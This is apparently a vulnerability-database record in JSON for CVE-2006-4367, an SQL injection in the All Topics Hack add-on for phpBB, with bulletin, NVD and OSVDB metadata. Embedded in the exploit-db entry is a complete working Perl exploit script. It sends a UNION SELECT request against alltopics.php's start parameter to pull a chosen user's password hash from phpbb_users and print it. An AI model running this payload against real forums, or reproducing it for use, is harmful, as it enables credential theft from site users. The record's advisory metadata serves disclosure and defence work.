ID E-248
Type dsquare
Reporter Dsquare Security
Modified 2013-04-02T00:00:00
Description
phpBB alltopics.php SQLI
Vulnerability Type: SQL Injection
For the exploit source code contact DSquare Security sales team.
{"id": "E-248", "hash": "d430d11336d528a5e9215f030751b371", "type": "dsquare", "bulletinFamily": "exploit", "title": "phpBB alltopics.php SQLI", "description": "phpBB alltopics.php SQLI\n\nVulnerability Type: SQL Injection", "published": "2012-01-26T00:00:00", "modified": "2013-04-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Dsquare Security", "references": ["https://vulners.com/OSVDB/OSVDB:30312", "https://vulners.com/BID/BID:19682"], "cvelist": ["CVE-2006-4367"], "lastseen": "2017-09-26T15:33:26", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4367"]}, {"type": "osvdb", "idList": ["OSVDB:30312"]}, {"type": "exploitdb", "idList": ["EDB-ID:2248"]}], "modified": "2017-09-26T15:33:26"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceData": "For the exploit source code contact DSquare Security sales team.", "_object_type": "robots.models.dsquare.DsquareBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"]}
{"cve": [{"lastseen": "2017-10-19T11:12:30", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in alltopics.php in the All Topics Hack 1.5.0 and earlier for phpBB 2.0.21 allows remote attackers to execute arbitrary SQL commands via the start parameter.", "modified": "2017-10-18T21:29:20", "published": "2006-08-26T17:04:00", "id": "CVE-2006-4367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4367", "title": "CVE-2006-4367", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:50:43", "bulletinFamily": "exploit", "description": "phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit. CVE-2006-4367. Webapps exploit for php platform", "modified": "2006-08-23T00:00:00", "published": "2006-08-23T00:00:00", "id": "EDB-ID:2248", "href": "https://www.exploit-db.com/exploits/2248/", "type": "exploitdb", "title": "phpBB All Topics Mod <= 1.5.0 - start Remote SQL Injection Exploit", "sourceData": "#!/usr/bin/perl\n\nprint q{\n_________________________________________________________________________\n\n\n / \\\n \\ \\ ,, / /\n '-.`\\()/`.-'\n .--_'( )'_--.\n / /` /`\"\"`\\ `\\ \\ * SpiderZ ForumZ Security *\n | | >< | |\n \\ \\ / /\n '.__.' \n\n\n# Author: SpiderZ\n# Exploit: All Topics Hack Sql injection\n# For: phpBB ( 2.0.x - 2.0.21 )\n# Site: www.spiderz.altervista.org\n# Site02: www.spiderz.netsons.org\n-------------------------------------------------------------------------\nMod download: http://www.phpbbhacks.com/download/2821\n-------------------------------------------------------------------------\n_________________________________________________________________________\n\n}; \n\nuse IO::Socket;\n\nprint q{\n=> Insert URL\n=> without ( http )\n=> };\n$server = <STDIN>;\nchop ($server);\nprint q{\n=> Insert directory\n=> es: /forum/ - /phpBB2/\n=> };\n$dir = <STDIN>;\nchop ($dir);\nprint q{\n=> User ID\n=> Number:\n=> };\n$user = <STDIN>;\nchop ($user);\nif (!$ARGV[2]) {\n}\n$myuser = $ARGV[3];\n$mypass = $ARGV[4];\n$myid = $ARGV[5];\n$server =~ s/(http:\\/\\/)//eg;\n$path = $dir;\n$path .= \"alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=\".$user ;\nprint \"\nExploit in process...\\r\\n\";\n$socket = IO::Socket::INET->new(\nProto => \"tcp\",\nPeerAddr => \"$server\",\nPeerPort => \"80\") || die \"Exploit failed\";\nprint \"Exploit\\r\\n\";\nprint \"in process...\\r\\n\";\nprint $socket \"GET $path HTTP/1.1\\r\\n\";\nprint $socket \"Host: $server\\r\\n\";\nprint $socket \"Accept: */*\\r\\n\";\nprint $socket \"Connection: close\\r\\n\\r\\n\";\nprint \"Exploit finished!\\r\\n\\r\\n\";\nwhile ($answer = <$socket>)\n{\nif ($answer =~/(\\w{32})/)\n{\nif ($1 ne 0) {\nprint \"MD5-Hash is: \".$1.\"\\r\\n\";\n}\nexit();\n}\n}\n\n# milw0rm.com [2006-08-23]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2248/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.phpbbhacks.com/download/2821\nISS X-Force ID: 28538\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2248\n[CVE-2006-4367](https://vulners.com/cve/CVE-2006-4367)\nBugtraq ID: 19682\n", "modified": "2006-08-23T16:11:33", "published": "2006-08-23T16:11:33", "href": "https://vulners.com/osvdb/OSVDB:30312", "id": "OSVDB:30312", "title": "All Topics Hack for phpBB alltopics.php start Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
